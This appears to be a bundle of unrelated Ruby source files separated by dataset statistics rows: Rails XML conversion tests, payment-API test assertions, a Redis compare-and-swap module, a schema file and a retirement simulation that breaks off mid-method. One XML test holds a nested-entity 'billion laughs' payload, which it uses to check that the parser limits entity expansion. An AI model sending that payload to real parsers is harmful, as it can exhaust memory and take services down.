assert xml.include?(%(<address><street>Paulina</street></address>))
assert xml.include?(%(<name>David</name>))
end
def test_two_levels_with_second_level_overriding_to_xml
xml = { :name => "David", :address => { :street => "Paulina" }, :child => IWriteMyOwnXML.new }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<address><street>Paulina</street></address>))
assert xml.include?(%(<level_one><second_level>content</second_level></level_one>))
end
def test_two_levels_with_array
xml = { :name => "David", :addresses => [{ :street => "Paulina" }, { :street => "Evergreen" }] }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<addresses type="array"><address>))
assert xml.include?(%(<address><street>Paulina</street></address>))
assert xml.include?(%(<address><street>Evergreen</street></address>))
assert xml.include?(%(<name>David</name>))
end
def test_three_levels_with_array
xml = { :name => "David", :addresses => [{ :streets => [ { :name => "Paulina" }, { :name => "Paulina" } ] } ] }.to_xml(@xml_options)
assert xml.include?(%(<addresses type="array"><address><streets type="array"><street><name>))
end
def test_timezoned_attributes
xml = {
:created_at => Time.utc(1999,2,2),
:local_created_at => Time.utc(1999,2,2).in_time_zone('Eastern Time (US & Canada)')
}.to_xml(@xml_options)
assert_match %r{<created-at type=\"dateTime\">1999-02-02T00:00:00Z</created-at>}, xml
assert_match %r{<local-created-at type=\"dateTime\">1999-02-01T19:00:00-05:00</local-created-at>}, xml
end
def test_multiple_records_from_xml_with_attributes_other_than_type_ignores_them_without_exploding
topics_xml = <<-EOT
<topics type="array" page="1" page-count="1000" per-page="2">
<topic>
<title>The First Topic</title>
<author-name>David</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id nil="true"></parent-id>
</topic>
<topic>
<title>The Second Topic</title>
<author-name>Jason</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id></parent-id>
</topic>
</topics>
EOT
expected_topic_hash = {
:title => "The First Topic",
:author_name => "David",
:id => 1,
:approved => false,
:replies_count => 0,
:replies_close_in => 2592000000,
:written_on => Date.new(2003, 7, 16),
:viewed_at => Time.utc(2003, 7, 16, 9, 28),
:content => "Have a nice day",
:author_email_address => "[email protected]",
:parent_id => nil
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topics_xml)["topics"].first
end
def test_single_record_from_xml
topic_xml = <<-EOT
<topic>
<title>The First Topic</title>
<author-name>David</author-name>
<id type="integer">1</id>
<approved type="boolean"> true </approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<author-email-address>[email protected]</author-email-address>
<parent-id></parent-id>
<ad-revenue type="decimal">1.5</ad-revenue>
<optimum-viewing-angle type="float">135</optimum-viewing-angle>
</topic>
EOT
expected_topic_hash = {
:title => "The First Topic",
:author_name => "David",
:id => 1,
:approved => true,
:replies_count => 0,
:replies_close_in => 2592000000,
:written_on => Date.new(2003, 7, 16),
:viewed_at => Time.utc(2003, 7, 16, 9, 28),
:author_email_address => "[email protected]",
:parent_id => nil,
:ad_revenue => BigDecimal("1.50"),
:optimum_viewing_angle => 135.0,
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topic_xml)["topic"]
end
def test_single_record_from_xml_with_nil_values
topic_xml = <<-EOT
<topic>
<title></title>
<id type="integer"></id>
<approved type="boolean"></approved>
<written-on type="date"></written-on>
<viewed-at type="datetime"></viewed-at>
<parent-id></parent-id>
</topic>
EOT
expected_topic_hash = {
:title => nil,
:id => nil,
:approved => nil,
:written_on => nil,
:viewed_at => nil,
:parent_id => nil
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topic_xml)["topic"]
end
def test_multiple_records_from_xml
topics_xml = <<-EOT
<topics type="array">
<topic>
<title>The First Topic</title>
<author-name>David</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id nil="true"></parent-id>
</topic>
<topic>
<title>The Second Topic</title>
<author-name>Jason</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id></parent-id>
</topic>
</topics>
EOT
expected_topic_hash = {
:title => "The First Topic",
:author_name => "David",
:id => 1,
:approved => false,
:replies_count => 0,
:replies_close_in => 2592000000,
:written_on => Date.new(2003, 7, 16),
:viewed_at => Time.utc(2003, 7, 16, 9, 28),
:content => "Have a nice day",
:author_email_address => "[email protected]",
:parent_id => nil
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topics_xml)["topics"].first
end
def test_single_record_from_xml_with_attributes_other_than_type
topic_xml = <<-EOT
<rsp stat="ok">
<photos page="1" pages="1" perpage="100" total="16">
<photo id="175756086" owner="55569174@N00" secret="0279bf37a1" server="76" title="Colored Pencil PhotoBooth Fun" ispublic="1" isfriend="0" isfamily="0"/>
</photos>
</rsp>
EOT
expected_topic_hash = {
:id => "175756086",
:owner => "55569174@N00",
:secret => "0279bf37a1",
:server => "76",
:title => "Colored Pencil PhotoBooth Fun",
:ispublic => "1",
:isfriend => "0",
:isfamily => "0",
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topic_xml)["rsp"]["photos"]["photo"]
end
def test_all_caps_key_from_xml
test_xml = <<-EOT
<ABC3XYZ>
<TEST>Lorem Ipsum</TEST>
</ABC3XYZ>
EOT
expected_hash = {
"ABC3XYZ" => {
"TEST" => "Lorem Ipsum"
}
}
assert_equal expected_hash, Hash.from_xml(test_xml)
end
def test_empty_array_from_xml
blog_xml = <<-XML
<blog>
<posts type="array"></posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => []}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_empty_array_with_whitespace_from_xml
blog_xml = <<-XML
<blog>
<posts type="array">
</posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => []}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_array_with_one_entry_from_xml
blog_xml = <<-XML
<blog>
<posts type="array">
<post>a post</post>
</posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => ["a post"]}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_array_with_multiple_entries_from_xml
blog_xml = <<-XML
<blog>
<posts type="array">
<post>a post</post>
<post>another post</post>
</posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => ["a post", "another post"]}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_file_from_xml
blog_xml = <<-XML
<blog>
<logo type="file" name="logo.png" content_type="image/png">
</logo>
</blog>
XML
hash = Hash.from_xml(blog_xml)
assert hash.has_key?('blog')
assert hash['blog'].has_key?('logo')
file = hash['blog']['logo']
assert_equal 'logo.png', file.original_filename
assert_equal 'image/png', file.content_type
end
def test_file_from_xml_with_defaults
blog_xml = <<-XML
<blog>
<logo type="file">
</logo>
</blog>
XML
file = Hash.from_xml(blog_xml)['blog']['logo']
assert_equal 'untitled', file.original_filename
assert_equal 'application/octet-stream', file.content_type
end
def test_tag_with_attrs_and_whitespace
xml = <<-XML
<blog name="bacon is the best">
</blog>
XML
hash = Hash.from_xml(xml)
assert_equal "bacon is the best", hash['blog']['name']
end
def test_empty_cdata_from_xml
xml = "<data><![CDATA[]]></data>"
assert_equal "", Hash.from_xml(xml)["data"]
end
def test_xsd_like_types_from_xml
bacon_xml = <<-EOT
<bacon>
<weight type="double">0.5</weight>
<price type="decimal">12.50</price>
<chunky type="boolean"> 1 </chunky>
<expires-at type="dateTime">2007-12-25T12:34:56+0000</expires-at>
<notes type="string"></notes>
<illustration type="base64Binary">YmFiZS5wbmc=</illustration>
<caption type="binary" encoding="base64">VGhhdCdsbCBkbywgcGlnLg==</caption>
</bacon>
EOT
expected_bacon_hash = {
:weight => 0.5,
:chunky => true,
:price => BigDecimal("12.50"),
:expires_at => Time.utc(2007,12,25,12,34,56),
:notes => "",
:illustration => "babe.png",
:caption => "That'll do, pig."
}.stringify_keys
assert_equal expected_bacon_hash, Hash.from_xml(bacon_xml)["bacon"]
end
def test_type_trickles_through_when_unknown
product_xml = <<-EOT
<product>
<weight type="double">0.5</weight>
<image type="ProductImage"><filename>image.gif</filename></image>
</product>
EOT
expected_product_hash = {
:weight => 0.5,
:image => {'type' => 'ProductImage', 'filename' => 'image.gif' },
}.stringify_keys
assert_equal expected_product_hash, Hash.from_xml(product_xml)["product"]
end
def test_from_xml_raises_on_disallowed_type_attributes
assert_raise ActiveSupport::XMLConverter::DisallowedType do
Hash.from_xml '<product><name type="foo">value</name></product>', %w(foo)
end
end
def test_from_xml_disallows_symbol_and_yaml_types_by_default
assert_raise ActiveSupport::XMLConverter::DisallowedType do
Hash.from_xml '<product><name type="symbol">value</name></product>'
end
assert_raise ActiveSupport::XMLConverter::DisallowedType do
Hash.from_xml '<product><name type="yaml">value</name></product>'
end
end
def test_from_trusted_xml_allows_symbol_and_yaml_types
expected = { 'product' => { 'name' => :value }}
assert_equal expected, Hash.from_trusted_xml('<product><name type="symbol">value</name></product>')
assert_equal expected, Hash.from_trusted_xml('<product><name type="yaml">:value</name></product>')
end
def test_should_use_default_value_for_unknown_key
hash_wia = HashWithIndifferentAccess.new(3)
assert_equal 3, hash_wia[:new_key]
end
def test_should_use_default_value_if_no_key_is_supplied
hash_wia = HashWithIndifferentAccess.new(3)
assert_equal 3, hash_wia.default
end
def test_should_nil_if_no_default_value_is_supplied
hash_wia = HashWithIndifferentAccess.new
assert_nil hash_wia.default
end
def test_should_return_dup_for_with_indifferent_access
hash_wia = HashWithIndifferentAccess.new
assert_equal hash_wia, hash_wia.with_indifferent_access
assert_not_same hash_wia, hash_wia.with_indifferent_access
end
def test_should_copy_the_default_value_when_converting_to_hash_with_indifferent_access
hash = Hash.new(3)
hash_wia = hash.with_indifferent_access
assert_equal 3, hash_wia.default
end
# The XML builder seems to fail miserably when trying to tag something
# with the same name as a Kernel method (throw, test, loop, select ...)
def test_kernel_method_names_to_xml
hash = { :throw => { :ball => 'red' } }
expected = '<person><throw><ball>red</ball></throw></person>'
assert_nothing_raised do
assert_equal expected, hash.to_xml(@xml_options)
end
end
def test_empty_string_works_for_typecast_xml_value
assert_nothing_raised do
ActiveSupport::XMLConverter.new("").to_h
end
end
def test_escaping_to_xml
hash = {
:bare_string => 'First & Last Name',
:pre_escaped_string => 'First & Last Name'
}.stringify_keys
expected_xml = '<person><bare-string>First & Last Name</bare-string><pre-escaped-string>First &amp; Last Name</pre-escaped-string></person>'
assert_equal expected_xml, hash.to_xml(@xml_options)
end
def test_unescaping_from_xml
xml_string = '<person><bare-string>First & Last Name</bare-string><pre-escaped-string>First &amp; Last Name</pre-escaped-string></person>'
expected_hash = {
:bare_string => 'First & Last Name',
:pre_escaped_string => 'First & Last Name'
}.stringify_keys
assert_equal expected_hash, Hash.from_xml(xml_string)['person']
end
def test_roundtrip_to_xml_from_xml
hash = {
:bare_string => 'First & Last Name',
:pre_escaped_string => 'First & Last Name'
}.stringify_keys
assert_equal hash, Hash.from_xml(hash.to_xml(@xml_options))['person']
end
def test_datetime_xml_type_with_utc_time
alert_xml = <<-XML
<alert>
<alert_at type="datetime">2008-02-10T15:30:45Z</alert_at>
</alert>
XML
alert_at = Hash.from_xml(alert_xml)['alert']['alert_at']
assert alert_at.utc?
assert_equal Time.utc(2008, 2, 10, 15, 30, 45), alert_at
end
def test_datetime_xml_type_with_non_utc_time
alert_xml = <<-XML
<alert>
<alert_at type="datetime">2008-02-10T10:30:45-05:00</alert_at>
</alert>
XML
alert_at = Hash.from_xml(alert_xml)['alert']['alert_at']
assert alert_at.utc?
assert_equal Time.utc(2008, 2, 10, 15, 30, 45), alert_at
end
def test_datetime_xml_type_with_far_future_date
alert_xml = <<-XML
<alert>
<alert_at type="datetime">2050-02-10T15:30:45Z</alert_at>
</alert>
XML
alert_at = Hash.from_xml(alert_xml)['alert']['alert_at']
assert alert_at.utc?
assert_equal 2050, alert_at.year
assert_equal 2, alert_at.month
assert_equal 10, alert_at.day
assert_equal 15, alert_at.hour
assert_equal 30, alert_at.min
assert_equal 45, alert_at.sec
end
def test_to_xml_dups_options
options = {:skip_instruct => true}
{}.to_xml(options)
# :builder, etc, shouldn't be added to options
assert_equal({:skip_instruct => true}, options)
end
def test_expansion_count_is_limited
expected =
case ActiveSupport::XmlMini.backend.name
when 'ActiveSupport::XmlMini_REXML'; RuntimeError
when 'ActiveSupport::XmlMini_Nokogiri'; Nokogiri::XML::SyntaxError
when 'ActiveSupport::XmlMini_NokogiriSAX'; RuntimeError
when 'ActiveSupport::XmlMini_LibXML'; LibXML::XML::Error
when 'ActiveSupport::XmlMini_LibXMLSAX'; LibXML::XML::Error
end
assert_raise expected do
attack_xml = <<-EOT
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
EOT
Hash.from_xml(attack_xml)
end
end
end
| 35.542781 | 173 | 0.675807 |
bf614653ed72fb883639a555146f33f59bd86830 | 177 | module Waistband
module Errors
class IndexExists < StandardError; end
class IndexNotFound < StandardError; end
class NoSearchHits < StandardError; end
end
end
| 17.7 | 44 | 0.745763 |
18d8192a3b0371c8250a554cdfb81acc63ab5775 | 7,851 | module Assertions
def assert_customer_response(customer)
assert customer.id
assert_equal customer.name, 'Jose da Silva'
assert_equal customer.document_number, '84931126235'
assert_equal customer.email, '[email protected]'
assert_equal customer.gender, 'M'
assert_equal Date.parse(customer.born_at), Date.parse('1970-10-11')
end
def assert_subscription_successfully_paid(subscription, amount = 2000, installments = 1)
assert subscription.id
assert !subscription.plan
assert subscription.current_transaction.kind_of?(PagarMe::Transaction)
assert subscription.current_transaction.id
assert subscription.current_transaction.date_created
assert !subscription.current_transaction.refuse_reason
assert !subscription.current_transaction.boleto_url
assert !subscription.current_transaction.boleto_barcode
assert_equal subscription.status, 'paid'
assert_equal subscription.current_transaction.amount, amount
assert_equal subscription.current_transaction.payment_method, 'credit_card'
assert_equal subscription.current_transaction.status, 'paid'
assert_equal subscription.current_transaction.card_brand, 'visa'
end
def assert_transaction_successfully(transaction)
assert transaction.id
assert transaction.date_created
assert transaction.card.id
assert !transaction.refuse_reason
assert_equal transaction.amount, 1000
assert_equal transaction.installments.to_i, 1
assert_equal transaction.card_holder_name, 'Jose da Silva'
assert_equal transaction.payment_method, 'credit_card'
assert_equal transaction.card_brand, 'visa'
assert_equal transaction.card.first_digits, '490172'
assert_equal transaction.card.last_digits, '4448'
end
def assert_transaction_successfully_paid(transaction)
assert !transaction.postback_url
assert_equal transaction.status, 'paid'
assert_transaction_successfully transaction
end
def assert_transaction_successfully_processing(transaction)
assert_equal transaction.postback_url, 'http://test.com/postback'
assert_equal transaction.status, 'processing'
assert_transaction_successfully transaction
end
def assert_transaction_with_customer_successfully_paid(transaction)
assert_transaction_successfully_paid transaction
assert_equal transaction.customer.class, PagarMe::Customer
assert_customer_response transaction.customer
assert_equal transaction.phone.class, PagarMe::Phone
assert_equal transaction.phone.ddd, '21'
assert_equal transaction.phone.number, '922334455'
assert_equal transaction.address.class, PagarMe::Address
assert_equal transaction.address.street, 'Av. Brigadeiro Faria Lima'
assert_equal transaction.address.neighborhood, 'Itaim bibi'
assert_equal transaction.address.zipcode, '01452000'
assert_equal transaction.address.street_number, '2941'
end
def assert_transaction_refused_by_acquirer(transaction)
assert transaction.id
assert transaction.date_created
assert transaction.card.id
assert_equal transaction.refuse_reason, 'acquirer'
assert_equal transaction.amount, 1000
assert_equal transaction.installments.to_i, 1
assert_equal transaction.card_holder_name, 'Jose da Silva'
assert_equal transaction.payment_method, 'credit_card'
assert_equal transaction.status, 'refused'
assert_equal transaction.card_brand, 'visa'
assert_equal transaction.card.first_digits, '490172'
assert_equal transaction.card.last_digits, '4448'
end
def assert_transaction_with_bolelo_on_waiting_payment(transaction)
assert transaction.date_created
assert transaction.boleto_barcode
assert transaction.boleto_expiration_date
assert transaction.boleto_url
assert_nil transaction.card
assert_nil transaction.card_holder_name
assert_equal transaction.payment_method, 'boleto'
assert_equal transaction.status, 'waiting_payment'
assert_equal transaction.amount.to_s, '1000'
end
def assert_split_rules(split_rules)
assert_equal split_rules.size, 4
rules = split_rules.sort_by(&:percentage)
assert_equal rules[0].recipient_id, Fixtures.persistent_recipient_ids[0]
assert_equal rules[1].recipient_id, Fixtures.persistent_recipient_ids[1]
assert_equal rules[2].recipient_id, Fixtures.persistent_recipient_ids[2]
assert_equal rules[3].recipient_id, Fixtures.persistent_recipient_ids[3]
assert_equal rules[0].percentage, 10
assert_equal rules[1].percentage, 20
assert_equal rules[2].percentage, 30
assert_equal rules[3].percentage, 40
end
def assert_plan_created(plan)
assert plan.id
assert_equal plan.name, 'Plano gold'
assert_equal plan.trial_days, 5
assert_equal plan.days, 30
assert_equal plan.amount, 3000
end
def assert_subscription_created(subscription, plan)
assert subscription.id
assert_equal subscription.status, 'trialing'
assert_equal subscription.plan.id, plan.id
end
def assert_no_trial_subscription_created(subscription, plan)
assert subscription.id
assert_equal subscription.status, 'paid'
assert_equal subscription.plan.id, plan.id
end
def assert_transaction_errors(params = {})
PagarMe::Transaction.create transaction_with_card_params(params)
rescue PagarMe::ValidationError
assert_no_match(/\s*\,\s*\Z/, $!.message)
end
def assert_has_error_param(exception, parameter_name)
assert exception.errors.any?{ |error| error.parameter_name == parameter_name }
end
def assert_hasnt_error_param(exception, parameter_name)
assert exception.errors.none?{ |error| error.parameter_name == parameter_name }
end
def assert_transfer(transfer)
assert transfer.id
assert transfer.fee
assert_equal transfer.class, PagarMe::Transfer
assert %w(doc credito_em_conta ted).include?(transfer.type)
end
def assert_empty_balance(balance)
assert_equal balance.available.amount, 0
assert_equal balance.waiting_funds.amount, 0
assert_equal balance.transferred.amount, 0
end
def assert_available_balance(balance)
assert(balance.available.amount > 0)
assert_equal balance.waiting_funds.amount, 0
assert_equal balance.transferred.amount, 0
end
def assert_transfered_balance(balance)
assert(balance.transferred.amount > 0)
assert_equal balance.available.amount, 0
assert_equal balance.waiting_funds.amount, 0
end
def assert_increased_available_amount(previous_balance, balance)
assert(previous_balance.available.amount < balance.available.amount)
assert_equal previous_balance.waiting_funds.amount, balance.waiting_funds.amount
assert_equal previous_balance.transferred.amount, balance.transferred.amount
end
def assert_anticipation_limits(limits)
assert limits.maximum.amount
assert limits.minimum.amount
end
def assert_anticipation(anticipation)
assert_statusless_anticipation anticipation
assert_equal anticipation.status, 'pending'
end
def assert_canceled_anticipation(anticipation)
assert_statusless_anticipation anticipation
assert_equal anticipation.status, 'canceled'
end
def assert_statusless_anticipation(anticipation)
assert anticipation.amount > 0
assert anticipation.fee
assert anticipation.anticipation_fee
assert_equal anticipation.object, 'bulk_anticipation'
end
end
| 39.255 | 90 | 0.745383 |
f81e79eaa2e423fcd835dfa79ab43ee36b924e8f | 1,665 | # encoding: utf-8
require 'spec_helper_min'
module Carto
describe 'Default cartography' do
let(:production_default_cartography) do
{
"simple" => {
"point" => {
"fill" => {
"size" => {
"fixed" => 7
},
"color" => {
"fixed" => "#EE4D5A",
"opacity" => 0.9
}
},
"stroke" => {
"size" => {
"fixed" => 1
},
"color" => {
"fixed" => "#FFFFFF",
"opacity" => 1
}
}
},
"line" => {
"fill" => {},
"stroke" => {
"size" => {
"fixed" => 1.5
},
"color" => {
"fixed" => "#4CC8A3",
"opacity" => 1
}
}
},
"polygon" => {
"fill" => {
"color" => {
"fixed" => "#826DBA",
"opacity" => 0.9
}
},
"stroke" => {
"size" => {
"fixed" => 1
},
"color" => {
"fixed" => "#FFFFFF",
"opacity" => 0.5
}
}
}
}
}
end
it 'has stayed the same' do
cartography_file_path = Carto::Styles::Style::CARTOGRAPHY_DEFINITION_LOCATION
cartography = Carto::Definition.instance.load_from_file(cartography_file_path)
cartography.should eq production_default_cartography
end
end
end
| 22.808219 | 84 | 0.325526 |
794fd6805ff0a24dd29f68d98090346bea1efd9e | 3,994 | class Redis
# simple enhancement of Redis::Store
class Store < self
# Implements Compare-And-Swap (or as Redis says Compare-And-Save)
# on top of Redis::Store using Redis::Store::watch. It is designated for simple values, not redis-lists/hashes etc
module Cas
# Single CAS
#
# Trys to save change the value of a redis-key when it may not done in a atomic matter. Eg, you have do some
# checks on old value before setting the new one and so on. If key content changes meanwhile it refuses to
# set and you will not overwrite changes from other Thread or Process.
#
# This method works only on existing keys in redis.
# It works only with keys holding a value, eg, read/writeable with get/set
#
# @yield [value] the current value of given key
# @yieldparam [String] key the key to get and set the value
# @yieldreturn [String] the new value to store in key
# @return [Boolean] true if new value was stored, otherwise false
# @param key [String] the key to set. Must not be nil and key must exists in Redis
# @param ttl [Integer] if not nil and integer > 0 set a TTL to the changed key
# @example
#
# storewithcas.cas('examplekey') do |value|
# # value is the CURRENT value!
# new_value = do_some_important_stuff_here(value)
# new_value # write back to redis unless key has changed meanwhile
# end
def cas key, ttl=nil
return false unless exists(key)
watch(key) do
value = get(key)
value = yield value
ires = multi do |multi|
multi.set(key,value,ttl.nil? ? {} : {:expire_after => ttl})
end
ires.is_a?(Array) && ires[0] == 'OK'
end
end
# Multi CAS
#
# Safe changing multiple keys at once. It works only with keys holding a value, eg, read/writeable with get/set
#
# @example
#
# storewithcas.cas_multi('key1','key1') do |currenthash|
# newhashedvalues = make_something_with_current(currenthash)
# newhashedvalues
# end
#
# @example
# storewithcas.cas_multi('k1','k2', :expire_in => 1200) do |currenthash| #=> ttl for all keys swapped
# {'k1' => '1', 'k2' => 2}
# end
#
# @yield [values] a key=>value hash with values of given keys. keys not existing are not yielded
# @yieldparam [Array] keys the keys to change
# @yieldreturn [Hash] key-value-pairs to change. Keys not given in parameter or not existing in redis are ignored.
# @return [Boolean] true if tried making changes, nil when keylist empty
# @param keys [Array] the keys to set. Must not be nil and keys must exists in Redis. After keys list you may append hash with options for redis.
def cas_multi *keys
return if keys.empty?
options = extract_options keys
watch(*keys) do
values = read_multi(*keys,options)
valuehash = yield values
valuehash.map do |name,value|
multi do |multi|
multi.set(name,value,options)
end if values.key?(name)
end
true
end
end
# Read list of keys and return values as Hash
#
# @param keys Array the keys to read
# @return [Hash] key-value-pairs of key found in redis, eg, exists.
#
# @example
# values = read_multi("key1","key2","key3") #=> {"key1" => "1", "key2" => "2", "key3" => "3"}
def read_multi *keys
options = extract_options keys
keys = keys.select {|k| exists(k)}
return {} if keys.empty?
values = mget(*keys,options)
values.nil? ? {} : Hash[keys.zip(values)]
end
private
def extract_options array
if array.last.is_a?(Hash) && array.last.instance_of?(Hash)
array.pop
else
{}
end
end
end
end
end
| 36.981481 | 151 | 0.599399 |
62a2d13a040cb166f9282bf8a976a11dd2c0dfdd | 2,732 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_11_02_144705) do
create_table "action_text_rich_texts", force: :cascade do |t|
t.string "name", null: false
t.text "body"
t.string "record_type", null: false
t.bigint "record_id", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["record_type", "record_id", "name"], name: "index_action_text_rich_texts_uniqueness", unique: true
end
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.integer "record_id", null: false
t.integer "blob_id", null: false
t.datetime "created_at", null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.string "service_name", null: false
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", null: false
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "active_storage_variant_records", force: :cascade do |t|
t.integer "blob_id", null: false
t.string "variation_digest", null: false
t.index ["blob_id", "variation_digest"], name: "index_active_storage_variant_records_uniqueness", unique: true
end
create_table "posts", force: :cascade do |t|
t.string "title"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
add_foreign_key "active_storage_attachments", "active_storage_blobs", column: "blob_id"
add_foreign_key "active_storage_variant_records", "active_storage_blobs", column: "blob_id"
end
| 44.064516 | 126 | 0.735359 |
3818fae2f5a44f06c82b5d33d341a56998460dc9 | 310 | module Admin::SellerVersion::Contract
class Assign < Reform::Form
include Forms::ValidationHelper
model :seller_application
property :assigned_to_id
validation :default, inherit: true do
required(:assigned_to_id).filled(:int?, in_list?: ->{ User.admin.map(&:id) })
end
end
end
| 22.142857 | 83 | 0.7 |
f80e45e218cac7593bc03ee91eb0d54fe3809b32 | 9,161 | module FortuneTeller
class Benchmark
def self.run(context = {})
create_sim.simulate(**default_context.merge(context))
end
def self.default_context
{
growth_rates: {
# these should match the holdings your retirement accounts have:
stocks: [1.06],
bonds: [1.04],
# these are reserved parameters for the simulation:
wage_growth: [1.00],
inflation: [1.02]
}
}
end
def self.random_contexts(num)
possible_returns = (0.90..1.30).step(0.01).to_a
growth_streams = num.times.map do
{
stocks: 100.times.map { possible_returns.sample },
bonds: 100.times.map { possible_returns.sample },
inflation: 100.times.map { possible_returns.sample },
wage_growth: 100.times.map { possible_returns.sample }
}
end
end
def self.create_sim
sim = FortuneTeller.new(Date.today)
sim.add_primary(
gender: :female,
birthday: Date.new(1964, 3, 2)
)
sim.add_partner(
gender: :male,
birthday: Date.new(1966, 5, 5)
)
# Define primary's key events and holdings
primary_retirement = Date.new(2031, 3, 1)
primary_401k = sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 300_000_00,
bonds: 200_000_00
}
)
end
sim.add_job(:primary) do |plan|
plan.beginning do |p|
p.set(
base: 100_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: primary_401k,
holding: :stocks
)
end
plan.on(primary_retirement).stop
end
sim.add_social_security(:primary) do |plan|
plan.on(primary_retirement).start
end
# Define partner's key events and holdings
partner_retirement = Date.new(2033, 5, 1)
partner_401k = sim.add_account(:partner) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 200_000_00,
}
)
end
sim.add_job(:partner) do |plan|
plan.beginning do |p|
p.set(
base: 75_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: partner_401k,
holding: :stocks
)
end
plan.on(partner_retirement).stop
end
sim.add_social_security(:partner) do |plan|
plan.on(partner_retirement).start(
pia: 1000_00
)
end
# Start by spending the leftovers (after tax and saving) and change to
# spending an exact amount in retirement
sim.add_spending_strategy do |plan|
plan.beginning.set(
strategy: :remainder
)
future_take_home_pay = (sim.initial_take_home_pay * 0.8).round
plan.on(primary_retirement).set(
strategy: :exact,
amount: future_take_home_pay # this will automatically increase with inflation
)
end
sim.add_tax_strategy do |plan|
plan.beginning.set(
primary: :married_filing_jointly,
partner: :married_filing_jointly
)
end
sim
end
def self.create_sim_guaranteed_income
sim = create_sim
sim.add_guaranteed_income do |plan|
plan.on(Date.new(2032, 2, 5)).start(
amount: 500_00,
annual_increase: 1.02
)
end
sim
end
def self.create_sim_percent_spending
sim = FortuneTeller.new(Date.today)
sim.add_primary(
gender: :female,
birthday: Date.new(1964, 3, 2)
)
sim.add_partner(
gender: :male,
birthday: Date.new(1966, 5, 5)
)
# Define primary's key events and holdings
primary_retirement = Date.new(2031, 3, 1)
primary_401k = sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 300_000_00,
bonds: 200_000_00
}
)
end
sim.add_job(:primary) do |plan|
plan.beginning do |p|
p.set(
base: 100_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: primary_401k,
holding: :stocks
)
end
plan.on(primary_retirement).stop
end
sim.add_social_security(:primary) do |plan|
plan.on(primary_retirement).start
end
# Define partner's key events and holdings
partner_retirement = Date.new(2033, 5, 1)
partner_401k = sim.add_account(:partner) do |plan|
plan.beginning.set(
